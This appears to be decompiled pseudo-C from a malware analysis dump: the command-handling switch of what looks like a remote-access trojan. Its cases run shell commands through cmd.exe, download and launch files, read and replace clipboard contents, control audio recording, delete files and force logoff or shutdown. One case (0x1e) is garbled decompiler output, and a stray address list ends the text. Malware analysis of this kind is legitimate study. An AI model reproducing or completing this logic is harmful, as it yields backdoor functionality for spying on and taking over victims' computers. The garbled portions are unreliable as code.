						E0040415E(_t371, _t471 - 0xffffffffffffffe8, _t437, _t460, E00401F8B(E00401E45( &_v476, _t437, _t460, __eflags, 0)));
						E00408909( &_v300, _t437, __eflags);
						__eflags = _v396;
						if(_v396 == 0) {
							E0040908A( &_v444,  *((intOrPtr*)(E00409069(E004090EE( &_v300,  &_v504),  &_v500, _t455))));
						}
						E0040905E();
						goto L138;
					} else {
						_t456 = _t452 - 1;
						if(_t456 > 0x33) {
							L138:
							E00401E6D( &_v444, _t437);
							E00401FB8();
							E00401FB8();
							return 0;
						} else {
							switch( *((intOrPtr*)(_t456 * 4 +  &M0041614C))) {
								case 0:
									_t340 = E0041A6E9(0,  &_v400, GetTickCount());
									_t342 = E0041A6E9(0,  &_v376, E0041A641( &_v400));
									_t343 = E0041A5F1(0,  &_v332, 0x472ec8); // executed
									_t344 = E0041A879(0,  &_v28, _t343);
									_t446 = E00402EF0(0,  &_v436, E00402E81( &_v128, E00402EF0(0,  &_v104, E00402E81( &_v80, E00402F11( &_v56, E00401E45( &_v444, _t343, _t460, _t478, 0), _t460, 0x472ec8), _t344), _t460, _t478, 0x472ec8), _t342), _t460, _t478, 0x472ec8);
									E00402E81(_t467 - 0x18, _t350, _t340);
									_push(0x4c);
									E00404A81(0x4734e8, _t350, _t478);
									E00401FB8();
									E00401FB8();
									E00401FB8();
									E00401FB8();
									E00401FB8();
									E00401FB8();
									E00401EE9();
									E00401FB8();
									E00401FB8();
									_t364 = E0043A3AC(_t362, E00401F8B(E00401E45( &_v476, _t350, _t460, _t478, 1)));
									if(_t364 == 0) {
										E00401E45( &_v464, _t446, _t460, __eflags, 0);
										_t437 = "0";
										_t366 = E00405AE5("0");
										__eflags = _t366;
										if(_t366 != 0) {
											_push(0);
											_t435 = 0x4734e8;
											goto L10;
										}
									} else {
										_t437 = _t364 + _t364;
										if(E004046D3(0x4734e8) == 0) {
											E00404F31(0x4734e8, _t437, 1);
										} else {
											E00404FD4(_t437);
										}
									}
									goto L138;
								case 1:
									_push(0);
									__ecx = 0x4734e8;
									L10:
									E004050C4(_t435, _t460);
									goto L138;
								case 2:
									__ecx =  &_v400;
									__eax = E0041B008(__ebx,  &_v400, __edx);
									__esp = __esp - 0x18;
									__edx = __eax;
									__ecx = __esp;
									__eax = E0041A879(__ebx, __esp, __edx);
									_push(0x33);
									__ecx = 0x4734e8;
									__eax = E00404A81(0x4734e8, __edx, __eflags);
									__ecx =  &_v428;
									goto L104;
								case 3:
									goto L138;
								case 4:
									 &_v352 = GetCurrentProcessId();
									__eax = E00440751(__ecx, __eax,  &_v352, 0xa);
									__esp = __esp - 0xc;
									__eax =  &_v352;
									__esi = __esp;
									__ecx =  &_v376;
									__edx = E0040EE40(__ebx,  &_v376, __edx, __eflags);
									__ecx =  &_v400;
									__edx = __eax;
									__ecx = __esp;
									__eax = E00408832(__ebx, __esp, __edx, __edi, __ebp, __eflags,  &_v352);
									_push(0x4f);
									goto L14;
								case 5:
									__ecx =  &_v444;
									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
									__eax = E00401F8B(__ecx);
									__ecx = __eax;
									__eax = E0041A6BC(__ecx);
									goto L138;
								case 6:
									L22:
									__eax = E004167F1(__ebx);
									goto L138;
								case 7:
									__ecx =  &_v444;
									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
									__eax = E00401F8B(__ecx);
									__eax = CloseWindow(__eax);
									goto L138;
								case 8:
									_push(3);
									goto L18;
								case 9:
									_push(9);
									L18:
									_push(0);
									L19:
									__ecx =  &_v444;
									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags);
									__eax = E00401F8B(__ecx);
									__eax = ShowWindow(__eax, ??);
									goto L138;
								case 0xa:
									__eax =  &_v348;
									__ecx =  &_v444;
									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
									__eax = E00401F8B(__ecx);
									__eax = GetWindowThreadProcessId(__eax,  &_v348);
									__ecx = _v352;
									__eax = E0041A6BC(_v352);
									goto L22;
								case 0xb:
									__ebx = 0;
									__ecx =  &_v444;
									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
									__eax = E00401F8B(__eax);
									__ecx =  &_v380;
									__eax = E0040415E(0,  &_v380, __edx, __ebp, __eax);
									__edx = L"/C ";
									__ecx =  &_v408;
									__ecx = __eax;
									__eax = ShellExecuteW(0, L"open", L"cmd.exe", __eax, 0, 0);
									__ecx =  &_v408;
									__eax = E00401EE9();
									__ecx =  &_v384;
									goto L104;
								case 0xc:
									__ecx =  &_v444;
									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 1);
									__ecx = 0x472f78;
									__eax = E00401FA0(0x472f78, __eax);
									__eflags =  *0x470ae7 - __bl; // 0x0
									if(__eflags == 0) {
										__ecx =  &_v444;
										__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
										__esp = __esp - 0x18;
										__ecx = __esp;
										__eax = E0040567A();
										goto L100;
									}
									goto L138;
								case 0xd:
									__ebx = 0;
									__ecx =  &_v444;
									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
									E00401F8B(__ecx) = ShellExecuteW(0, L"open", __eax, 0, 0, 1);
									goto L138;
								case 0xe:
									__ecx =  &_v444;
									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 2);
									__eax = E00401F8B(__ecx);
									__eax = E0043A3AC(__ecx, __eax);
									__ecx =  &_v448;
									__esi = __eax;
									__eax = E00401E45( &_v448, __edx, __ebp, __eflags, 0);
									__ecx =  &_v440;
									__eax = E004020D6(__ebx,  &_v440, __edx, __eflags, __eax);
									__edx = "0";
									__ecx =  &_v444;
									__eax = E0040AF37(__eflags);
									__ecx =  &_v456;
									_push(4);
									__eflags = __al;
									if(__eflags == 0) {
										__eax = E00401E45( &_v456, __edx, __ebp, __eflags);
										__esp = __esp - 0x18;
										__ecx = __esp;
										__eax = E004020D6(__ebx, __esp, __edx, __eflags, __eax);
										__esp = __esp - 0x18;
										__eax =  &_v440;
										__ecx = __esp;
										__eax = E004020D6(__ebx, __esp, __edx, __eflags,  &_v440);
										__edi = 0x4736e8;
									} else {
										__eax = E00401E45( &_v456, __edx, __ebp, __eflags);
										__esp = __esp - 0x18;
										__ecx = __esp;
										__eax = E004020D6(__ebx, __esp, __edx, __eflags, __eax);
										__esp = __esp - 0x18;
										__eax =  &_v440;
										__ecx = __esp;
										__eax = E004020D6(__ebx, __esp, __edx, __eflags,  &_v440);
										__edi = 0x473630;
									}
									__ecx = __edi;
									__eax = E0041765D(__edi, __edx);
									__ecx =  &_v492;
									__ecx = E00401E45( &_v492, __edx, __ebp, __eflags, 3);
									__eax = E00401F8B(__ecx);
									__eax = E0043A3AC(__ecx, __eax);
									__eflags = __eax;
									__eax = __eax & 0xffffff00 | __eflags != 0x00000000;
									__ecx =  &_v496;
									__eax = __al & 0x000000ff;
									__ecx = E00401E45( &_v496, __edx, __ebp, __eflags, 1);
									E00401F8B(__ecx) = E0043A3AC(__ecx, __eax);
									__ecx = __edi;
									__eax = E00417825(__edi, __eflags, __eax, __al & 0x000000ff, __esi);
									goto L136;
								case 0xf:
									__ecx =  &_v432;
									__eax = E00419EDB( &_v432, __edx);
									__esp = __esp - 0x18;
									__eax =  &_v432;
									__ecx = __esp;
									__eax = E004020D6(__ebx, __esp, __edx, __eflags,  &_v432);
									_push(0x11);
									__ecx = 0x4734e8;
									__eax = E00404A81(0x4734e8, __edx, __eflags);
									L136:
									__ecx =  &_v432;
									goto L137;
								case 0x10:
									__ecx =  &_v444;
									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020D6(__ebx, __esp, __edx, __eflags, __eax);
									__ecx = 0x473040;
									__eax = E0040959D(0x473040, __edx);
									goto L138;
								case 0x11:
									__ecx = 0x473040;
									__eax = E0040A461(0x473040, __edx);
									goto L138;
								case 0x12:
									__ecx = 0x473040;
									__eax = E0040A5C4(__ebx, 0x473040, __edx);
									goto L138;
								case 0x13:
									__ecx =  &_v444;
									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
									__ecx = 0x4730d0;
									__eax = E00401FA0(0x4730d0, __eax);
									__ecx = 0x473040;
									goto L35;
								case 0x14:
									 *0x470b34 =  *0x470b34 + 1;
									__eflags =  *0x470b34;
									__ecx =  &_v444;
									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 1);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020D6(__ebx, __esp, __edx, __eflags, __eax);
									__ecx =  &_v452;
									__eax = E00401E45( &_v452, __edx, __ebp, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020D6(__ebx, __esp, __edx, __eflags, __eax);
									__ecx = 0x473040;
									__eax = E0040A006(__ebx, 0x473040, __edx, __eflags);
									goto L37;
								case 0x15:
									__esi = 0x473040;
									__ecx = 0x473040;
									__eax = E0040ADDF(0x473040);
									__ecx = 0x473040;
									L35:
									__eax = E00409EB4(__ebx, __ecx);
									goto L138;
								case 0x16:
									__eflags =  *0x470b1a - __bl;
									asm("sbb eax, 0x470b1a");
									if(__eflags == 0) {
										__edx = 0;
										__cl = 0;
										__eax = E0040B6DC(0);
									}
									goto L138;
								case 0x17:
									__ebx = 0;
									__ecx =  &_v444;
									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
									__edi = 0x472e30;
									__ecx = 0x472e30;
									__eax = E00401FA0(0x472e30, __eax);
									__esi = 0x472e48;
									__ecx = 0x472e48;
									__eax = E0040480D(0x472e48);
									__ecx = 0x472e48;
									__eax = E004048A8(0x472e48, 0x472e48, 0x472e48);
									__esp = __esp - 0x18;
									__ecx = __esp;
									_push(0x472e30);
									__eflags =  *0x470aba - __bl; // 0x0
									if(__eflags == 0) {
										__eax = E004020D6(0, __ecx, __edx, __eflags);
									} else {
										__eax = E004020D6(0, __ecx, __edx, __eflags);
									}
									__ecx = __esi;
									__eax = E00404A81(__esi, __edx, __eflags);
									__ecx = __esi;
									__eax = E00404BF0(__ecx, __edx, 0x404401, __ebx);
									goto L138;
								case 0x18:
									__eax =  *0x470ad0();
									__ecx = 0x472e48;
									__eax = E00404E06(__edx);
									goto L138;
								case 0x19:
									__ebx = 0;
									__ecx =  &_v444;
									 *0x470a84 = __bl;
									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 3);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020D6(0, __esp, __edx, __eflags, __eax);
									__ecx =  &_v452;
									__ecx = E00401E45( &_v452, __edx, __ebp, __eflags, 2);
									E00401F8B(__ecx) = E0043A3AC(__ecx, __eax);
									__ecx =  &_v456;
									__ecx = E00401E45( &_v456, __edx, __ebp, __eflags, 1);
									__eax = E00401F8B(__ecx);
									__eax = E0043A3AC(__ecx, __eax);
									__ecx =  &_v460;
									__esi = __eax;
									__ecx = E00401E45( &_v460, __edx, __ebp, __eflags, 0);
									__eax = E00401F8B(__ecx);
									__eax = E0043A3AC(__ecx, __eax);
									__edx = __esi;
									__ecx = __eax;
									__eax = E004016EF(__ecx, __edx, __edi, __esi, __ebp, __eax);
									goto L138;
								case 0x1a:
									_push( *0x470ac8);
									__eax = __eax ^ 0x00470ac8;
									 *0x470a84 = 1;
									waveInStop(??) = waveInClose( *0x470ac8);
									goto L138;
								case 0x1b:
									 *0x470b34 =  *0x470b34 + 1;
									__eflags =  *0x470b34;
									__eax = 0x470b34 + __eax;
									__ecx =  &_v444;
									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 1);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020D6(__ebx, __esp, __edx, __eflags, __eax);
									__ecx =  &_v452;
									__eax = E00401E45( &_v452, __edx, __ebp, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E00411E6D(__ebx, __edx);
									__esp = __esp + 0x30;
									L37:
									 *0x470b34 =  *0x470b34 - 1;
									goto L138;
								case 0x1c:
									__ecx =  &_v444;
									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
									E00401F8B(__ecx) = DeleteFileW(__eax);
									goto L138;
								case 0x1d:
									__eax = E00411D93();
									ExitProcess(0);
								case 0x1e:
									while(1) {
										__eflags =  *0x470b34 - __ebx;
										if( *0x470b34 == __ebx) {
											break;
										}
										Sleep(0x64);
									}
									asm("lds ecx, [ebx]");
									 *__eax =  *__eax + __al;
									__eflags =  *__eax;
									E0040C5A4();
									asm("ror dword [esi+0x41], 0x0");
									asm("insd");
									_push(__eax);
									__ecx = __ecx + 1;
									_a86 = _a86 + __ah;
									__ecx = __ecx + 1;
									 *__eax =  *__eax + __bl;
									asm("popad");
									__ecx = __ecx + 1;
									 *__eax =  *__eax + __bl;
									asm("popad");
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__esi + 0x50)) =  *((intOrPtr*)(__esi + 0x50)) + __dh;
									__ecx = __ecx + 1;
									__ah = __ah + __dl;
									_push(__eax);
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edi + 0x51)) =  *((intOrPtr*)(__edi + 0x51)) + __dh;
									__ecx = __ecx + 1;
									__cl = __cl + __bh;
									_push(__eax);
									__ecx = __ecx + 1;
									 *__esi =  *__esi + __bl;
									_push(__ecx);
									__ecx = __ecx + 1;
									_a77 = _a77 + __al;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ecx + 0x51)) =  *((intOrPtr*)(__ecx + 0x51)) + __cl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ecx - 0x24ffbeaf)) =  *((intOrPtr*)(__ecx - 0x24ffbeaf)) + __al;
									_push(__ecx);
									__ecx = __ecx + 1;
									 *0x46004152 =  *0x46004152 + __bl;
									_push(__edx);
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax + 0x41 + __edx * 2)) =  *((intOrPtr*)(__eax + 0x41 + __edx * 2)) + __al;
									 *__eax =  *__eax + __ch;
									_push(__ebx);
									__ecx = __ecx + 1;
									_a79 = _a79 + __cl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ebx + 0x41 + __edx * 2)) =  *((intOrPtr*)(__ebx + 0x41 + __edx * 2)) + __bl;
									 *((intOrPtr*)(__ebx + 0x53)) =  *((intOrPtr*)(__ebx + 0x53)) + __ch;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax - 0x28ffbead)) =  *((intOrPtr*)(__eax - 0x28ffbead)) + __dl;
									_push(__ebx);
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edi + 0x1800415a)) =  *((intOrPtr*)(__edi + 0x1800415a)) + __ch;
									asm("popad");
									__ecx = __ecx + 1;
									 *__eax =  *__eax + __bl;
									asm("popad");
									__ecx = __ecx + 1;
									__bh = __bh + __ah;
									_push(__ebx);
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ebx + 0x54)) =  *((intOrPtr*)(__ebx + 0x54)) + __cl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax + 0x54)) =  *((intOrPtr*)(__eax + 0x54)) + __ah;
									__ecx = __ecx + 1;
									__ah = __ah + __bl;
									_push(__esp);
									__ecx = __ecx + 1;
									 *__eax =  *__eax + __al;
									_push(__ebp);
									__ecx = __ecx + 1;
									 *__edi =  *__edi + __bh;
									_push(__ebp);
									__ecx = __ecx + 1;
									_a81 = _a81 + __bl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edx + 0x55)) =  *((intOrPtr*)(__edx + 0x55)) + __dh;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edi - 0x78ffbea1)) =  *((intOrPtr*)(__edi - 0x78ffbea1)) + __cl;
									_push(__ebp);
									__ecx = __ecx + 1;
									 *0x69004156 =  *0x69004156 + __cl;
									_push(__esi);
									__ecx = __ecx + 1;
									__ch = __ch + __dh;
									_push(__esi);
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax + 0x58020041 + __ebx * 2)) =  *((intOrPtr*)(__eax + 0x58020041 + __ebx * 2)) + __bl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ecx - 0x1ffbea8)) =  *((intOrPtr*)(__ecx - 0x1ffbea8)) + __al;
									_pop(__eax);
									__ecx = __ecx + 1;
									 *__edx =  *__edx + __dh;
									_pop(__ecx);
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ebx - 0x72ffbea7)) =  *((intOrPtr*)(__ebx - 0x72ffbea7)) + __al;
									_pop(__ecx);
									__ecx = __ecx + 1;
									_v855621291 = _v855621291 + __ch;
									_pop(__ecx);
									__ecx = __ecx + 1;
									__ch = __ch + __ch;
									_pop(__ecx);
									__ecx = __ecx + 1;
									_a86 = _a86 + __al;
									__ecx = __ecx + 1;
									 *__eax =  *__eax + __bl;
									asm("popad");
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edi + 0x200415a)) =  *((intOrPtr*)(__edi + 0x200415a)) + __cl;
									_pop(__esp);
									__ecx = __ecx + 1;
									 *__edi =  *__edi + __ah;
									_pop(__esp);
									__ecx = __ecx + 1;
									_a89 = _a89 + __ah;
									__ecx = __ecx + 1;
									 *__edx =  *__edx + __bl;
									_pop(__esi);
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ecx + 0x5e)) =  *((intOrPtr*)(__ecx + 0x5e)) + __dh;
									__ecx = __ecx + 1;
									__bh = __bh + __bl;
									_pop(__ebx);
									__ecx = __ecx + 1;
									_v1124056743 = _v1124056743 + __bl;
									_pop(__ebp);
									__ecx = __ecx + 1;
									 *__edx =  *__edx + __bl;
									_pop(__edi);
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edi + __ebx * 2)) =  *((intOrPtr*)(__edi + __ebx * 2)) + __ah;
									__ecx = __ecx + 1;
									 *__esi =  *__esi + __ch;
									_pop(__edi);
									__ecx = __ecx + 1;
									__al = __al + __ch;
									_pop(__esi);
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ecx + 0x3800415e)) =  *((intOrPtr*)(__ecx + 0x3800415e)) + __dl;
									_pop(__edi);
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ebx + 0x5500415e)) =  *((intOrPtr*)(__ebx + 0x5500415e)) + __bl;
									_pop(__ebp);
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ebp + 0x41 + __ebx * 2)) =  *((intOrPtr*)(__ebp + 0x41 + __ebx * 2)) + __bl;
									 *((intOrPtr*)(__eax - 0x22ffbea4)) =  *((intOrPtr*)(__eax - 0x22ffbea4)) + __ah;
									_pop(__ebp);
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ecx + 0xb00415f)) =  *((intOrPtr*)(__ecx + 0xb00415f)) + __bl;
									_pop(__ebp);
									__ecx = __ecx + 1;
									 *__eax =  *__eax + __dh;
									_pop(__ebp);
									__ecx = __ecx + 1;
									__bh = __bh + __ch;
									_pop(__edi);
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax + 0x60)) =  *((intOrPtr*)(__eax + 0x60)) + __cl;
									__ecx = __ecx + 1;
									 *__eax =  *__eax + __bl;
									asm("popad");
									__ecx = __ecx + 1;
									 *__eax =  *__eax + __al;
									asm("sbb [ecx], al");
									asm("sbb [edx], al");
									__ebx = __ebx +  *__eax;
									__al = __al + 5;
									_push(es);
									_pop(es);
									asm("sbb [eax], bl");
									asm("sbb [eax], cl");
									 *__edx =  *__edx | __ecx;
									asm("sbb [ebx], cl");
									__al = __al | 0x00000018;
									asm("sbb [eax], bl");
									asm("sbb [eax], bl");
									asm("sbb [eax], bl");
									__eflags = __eax;
									asm("sbb [eax], bl");
									asm("adc [eax], ebx");
									asm("sbb [eax], bl");
									asm("sbb [eax], bl");
									asm("sbb [eax], bl");
									asm("sbb [eax], bl");
									asm("sbb [eax], bl");
									asm("sbb [eax], bl");
									asm("sbb [eax], bl");
									asm("sbb [eax], bl");
									asm("sbb [edx], dl");
									asm("adc ebx, [eax]");
									asm("adc al, 0x15");
									_push(ss);
									_pop(ss);
									_push(__esi);
									__esi = __ecx;
									__ecx = __esi + 4;
									E004046D7(__esi + 4, __ebp, 0) = __esi;
									_pop(__esi);
									return __esi;
									goto L141;
								case 0x1f:
									L130:
									__eax = E0040CD03(__ebx, __eflags);
									goto L138;
								case 0x20:
									while(1) {
										__eflags =  *0x470b34 - __ebx; // 0x0
										if(__eflags == 0) {
											break;
										}
										Sleep(0x64);
									}
									__ebx = 0;
									__ecx =  &_v444;
									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
									__eax = E00401F8B(__eax);
									__ecx =  &_v448;
									__esi = __eax;
									__ecx = E00401E45( &_v448, __edx, __ebp, __eflags, 1);
									__eax = E00401F8B(__eax);
									__dl =  *__esi;
									__ecx =  &_v440;
									__eax = E0040CF38( &_v440, __edx, __eax);
									_push(0);
									_push(0);
									__ecx =  &_v440;
									_push(E00401EE4( &_v440));
									__ecx =  &_v452;
									__ecx = E00401E45( &_v452, __edx, __ebp, __eflags, 2);
									__eax = E00401F8B(__eax);
									_push(__eax);
									_push(0);
									__imp__URLDownloadToFileW();
									__eflags = __eax;
									if(__eflags == 0) {
										__esp = __esp - 0x18;
										__eax =  &_v452;
										__ecx = __esp;
										E004086D0(0, __esp, __edx, __eflags,  &_v452) = E0040C929(__edx);
										__esp = __esp + 0x18;
									}
									goto L103;
								case 0x21:
									__ecx =  &_v260;
									__eax = E004046D7( &_v260, __ebp, 1);
									__ecx =  &_v264;
									__eax = E004048A8( &_v264, __esi,  &_v264);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E00402073(__ebx, __esp, __edx, __ebp, 0x464074);
									_push(0x25);
									__ecx =  &_v272;
									__eax = E00404A81( &_v272, __edx, __eflags);
									__ecx =  &_v300;
									__eax = E00404BF0( &_v300, __edx, E0040D144, 0);
									__ecx =  &_v308;
									__eax = E00404EC2(__ebx, __ecx, __edx, __esi);
									goto L138;
								case 0x22:
									__ecx =  &_v444;
									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 2);
									__eax = E00401F8B(__ecx);
									__eax = __eax + 0x10000;
									__ecx =  &_v448;
									__ecx = E00401E45( &_v448, __edx, __ebp, __eflags, 1);
									__eax = E00401F8B(__eax);
									__ebx = 0;
									__ecx =  &_v452;
									__ecx = E00401E45( &_v452, __edx, __ebp, __eflags, 0);
									__eax = E00401F8B(__eax);
									__eax = MessageBoxW(0, __eax, __eax, __eax);
									__ecx =  &_v456;
									__esi = __eax;
									__eax = E00401E45( &_v456, __edx, __ebp, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx =  &_v392;
									__edi = __esp;
									__edx = __esi;
									__edx = E0041A6E9(0,  &_v392, __esi);
									__ecx =  &_v416;
									__edx = __eax;
									__ecx = __edi;
									__eax = E00402EF0(0, __edi, __edx, __ebp, __eflags, __eax);
									_push(0x26);
									L14:
									__ecx = 0x4734e8;
									__eax = E00404A81(0x4734e8, __edx, __eflags);
									__ecx =  &_v428;
									__eax = E00401FB8();
									__ecx =  &_v404;
									L137:
									__eax = E00401FB8();
									goto L138;
								case 0x23:
									__eax = E00416840();
									__ebx = 0;
									__ecx =  &_v444;
									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
									__edx = "0";
									__ecx = __eax;
									__eax = E00405AE5(__edx);
									__ecx =  &_v448;
									_push(0);
									__eflags = __al;
									if(__eflags == 0) {
										__eax = E00401E45( &_v448, __edx, __ebp, __eflags);
										__edx = "1";
										__ecx = __eax;
										__eax = E00405AE5(__edx);
										__ecx =  &_v448;
										_push(0);
										__eflags = __al;
										if(__eflags == 0) {
											__eax = E00401E45( &_v448, __edx, __ebp, __eflags);
											__edx = "2";
											__ecx = __eax;
											__eax = E00405AE5(__edx);
											__eflags = __al;
											if(__eflags == 0) {
												__eax = LoadLibraryA("PowrProf.dll");
												__eax = GetProcAddress(__eax, "SetSuspendState");
												__ecx =  &_v444;
												__esi = __eax;
												__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
												__edx = "3";
												__ecx = __eax;
												__eax = E00405AE5(__edx);
												_push(0);
												__eflags = __al;
												if(__eflags == 0) {
													__ecx =  &_v444;
													__eax = E00401E45( &_v444, __edx, __ebp, __eflags);
													__edx = "4";
													__ecx = __eax;
													__eax = E00405AE5(__edx);
													__eflags = __al;
													if(__al != 0) {
														_push(0);
														_push(0);
														_push(1);
														goto L72;
													}
												} else {
													_push(0);
													_push(0);
													L72:
													__eax =  *__esi();
												}
											} else {
												_push(0);
												__ecx =  &_v444;
												__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 1);
												__eax = E00401F8B(__ecx);
												__eax = E0043A3AC(__ecx, __eax);
												__eax = __eax | 0x00000002;
												__eflags = __eax;
												goto L67;
											}
										} else {
											__ecx = E00401E45( &_v448, __edx, __ebp, __eflags, 1);
											__eax = E00401F8B(__ecx);
											__eax = E0043A3AC(__ecx, __eax);
											__eax = __eax | 0x00000001;
											goto L67;
										}
									} else {
										__ecx = E00401E45( &_v448, __edx, __ebp, __eflags, 1);
										__eax = E00401F8B(__ecx);
										__eax = E0043A3AC(__ecx, __eax);
										L67:
										_pop(__ecx);
										__eax = ExitWindowsEx(__eax, ??);
									}
									goto L138;
								case 0x24:
									L78:
									__eax = OpenClipboard(__ebx);
									__eflags = __eax;
									if(__eax != 0) {
										__esi = GetClipboardData(0xd);
										__edi = GlobalLock(__esi);
										GlobalUnlock(__esi) = CloseClipboard();
										__eflags = __edi;
										0x46a8f0 =  !=  ? __edi : 0x46a8f0;
										__ecx =  &_v432;
										__eax = E0040415E(__ebx,  &_v432, __edx, __ebp,  !=  ? __edi : 0x46a8f0);
										__esp = __esp - 0x18;
										__edx =  &_v436;
										__ecx = __esp;
										__eax = E0041A879(__ebx, __esp, __edx);
										_push(0x6b);
										__ecx = 0x4734e8;
										__eax = E00404A81(0x4734e8, __edx, __eflags);
										L103:
										__ecx =  &_v432;
										L104:
										__eax = E00401EE9();
									}
									goto L138;
								case 0x25:
									__eflags = OpenClipboard(0);
									if(__eflags != 0) {
										__eax = EmptyClipboard();
										__ecx =  &_v444;
										__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
										__eax = E0040245C();
										__eax = __eax + 2;
										__edi = __eax;
										__eax = GlobalLock(__edi);
										__ecx =  &_v448;
										__esi = __eax;
										__ecx = E00401E45( &_v448, __edx, __ebp, __eflags, 0);
										__eax = E0040245C();
										__ecx =  &_v452;
										__ecx = E00401E45( &_v452, __edx, __ebp, __eflags, 0);
										GlobalUnlock(__edi) = SetClipboardData(0xd, __edi);
										goto L77;
									}
									goto L138;
								case 0x26:
									__eax = OpenClipboard(0);
									__eflags = __eax;
									if(__eax != 0) {
										__eax = EmptyClipboard();
										L77:
										__eax = CloseClipboard();
										goto L78;
									}
									goto L138;
								case 0x27:
									__ebx = 0;
									__ecx =  &_v444;
									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
									__eax = E0040245C();
									__ecx =  &_v448;
									__esi = __eax;
									__ecx = E00401E45( &_v448, __edx, __ebp, __eflags, 0);
									__eax = E00401F8B(__eax);
									__edx = __esi;
									__ecx = __eax;
									__eax = E00411235();
									goto L138;
								case 0x28:
									__eax =  &_v404;
									__ebx = 0;
									__ecx =  &_v444;
									_v404 = 0;
									_v408 = 0;
									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
									__eax = E00401F8B(__eax);
									__edx =  &_v412;
									__ecx = __eax;
									__eax = E0041A551(__eax, __edx,  &_v404);
									__eflags = __eax - 1;
									if(__eax == 1) {
										__edx = _v404;
										__ecx = _v408;
										E00411235() = L0043A61B(_v408);
									}
									goto L138;
								case 0x29:
									__eax = E0040B774(__ebx, __edx, __eflags);
									goto L138;
								case 0x2a:
									__ecx =  &_v444;
									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E00416B88(__ebx, __edx, __esi, __ebp);
									goto L100;
								case 0x2b:
									__ecx =  &_v444;
									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004137CC(__ebx, __edx, __esi, __ebp);
									goto L100;
								case 0x2c:
									__ecx =  &_v444;
									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E0040540F(__ebx, __edx, __esi, __ebp, __eflags);
									goto L100;
								case 0x2d:
									_push(__ecx);
									__esi = 0x473280;
									__ecx = 0x473280;
									__eax = E0040245C();
									__ecx = 0x473280;
									__eax = E00401F8B(0x473280);
									__ebx = 0;
									__ecx =  &_v444;
									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
									E0040245C() = __eax + 1;
									__ecx =  &_v448;
									__ecx = E00401E45( &_v448, __edx, __ebp, __eflags, 0);
									__eax = E00401F8B(__eax);
									__ecx = 0x473238;
									__edx = E00401F8B(0x473238);
									__eax = E00412C2F(__edx, __eflags, "name", __eax, __eax, __eax, __eax);
									goto L100;
								case 0x2e:
									__ecx =  &_v444;
									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004109E1(__ebx, __edx, __esi, __ebp, __eflags);
									goto L100;
								case 0x2f:
									__ecx =  &_v444;
									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E00418D73(__ebx, __edx);
									L100:
									goto L138;
							}
						}
					}
				}
				L141:
			}








































































                    0x00414e1c
                    0x00414e1c
                    0x00414e1c
                    0x00414e1d
                    0x00414e2f
                    0x00414e31
                    0x00414e39
                    0x00414e41
                    0x00414e5e
                    0x00414e68
